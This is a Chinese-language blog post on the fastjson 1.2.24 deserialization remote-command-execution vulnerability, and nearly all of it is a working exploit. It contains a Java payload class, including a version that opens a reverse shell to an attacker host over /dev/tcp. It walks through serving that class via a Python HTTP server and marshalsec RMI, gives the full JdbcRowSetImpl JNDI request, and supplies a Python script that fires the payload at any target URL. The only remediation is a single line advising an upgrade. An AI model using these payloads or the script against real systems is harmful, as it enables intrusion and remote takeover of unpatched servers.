fastjson 1.2.24 反序列化导致任意命令执行漏洞

简介

Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。

Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。

poc

//FileName:Exploit.java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

编译成class的文件上传到vps。

javac   Exploit.java

通过python3 启动http服务，将poc移至改目录。

python3   -m   http.server 8888

开启远程加载类服务，可以通过Jrmp服务或者Ldap服务加载远程类文件

JRMP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999

构造数据包加载远程类

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vps:9999/TouchFile",
        "autoCommit":true
    }
}

文件被创建，命令执行成功

反弹shell

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >&  /dev/tcp/vps/55555 0>&1"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

工具附件

脚本检测：

#FileName:fastjson-1.2.24_rce.py

import sys
import requests

if len(sys.argv)!=3:
    print('+------------------------------------------------------------------------------------+')
    print('+      RMIServer: rmi://ip:port/exp                                                  +')
    print('+      LDAPServer: ldap://ip:port/exp                                                +')
    print('+------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer>                               +')
    print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object  +')
    print('+ VER: fastjson<=1.2.24                                                              +')
    print('+------------------------------------------------------------------------------------+')
    sys.exit()

url = sys.argv[1]
server = sys.argv[2]

headers = {
    'Host': "127.0.0.1",
    'Content-Type': "application/json",
    'Accept-Encoding': "gzip, deflate",
    'Connection': "close",
    'Accept': "*/*",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
    }
 

payload = '''
{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"%s",
        "autoCommit":true
    }
}  
''' %server


try:
    r = requests.post(url, payload, headers=headers, timeout=10)
    print ("[+] RMI/LDAP Send Success ")
except:
    print ("[-] RMI/LDAP Send Failed ")

python fastjson-1.2.24_rce.py

修复建议

升级fastjson到最新版本

本文由博客群发一文多发等运营工具平台 OpenWrite 发布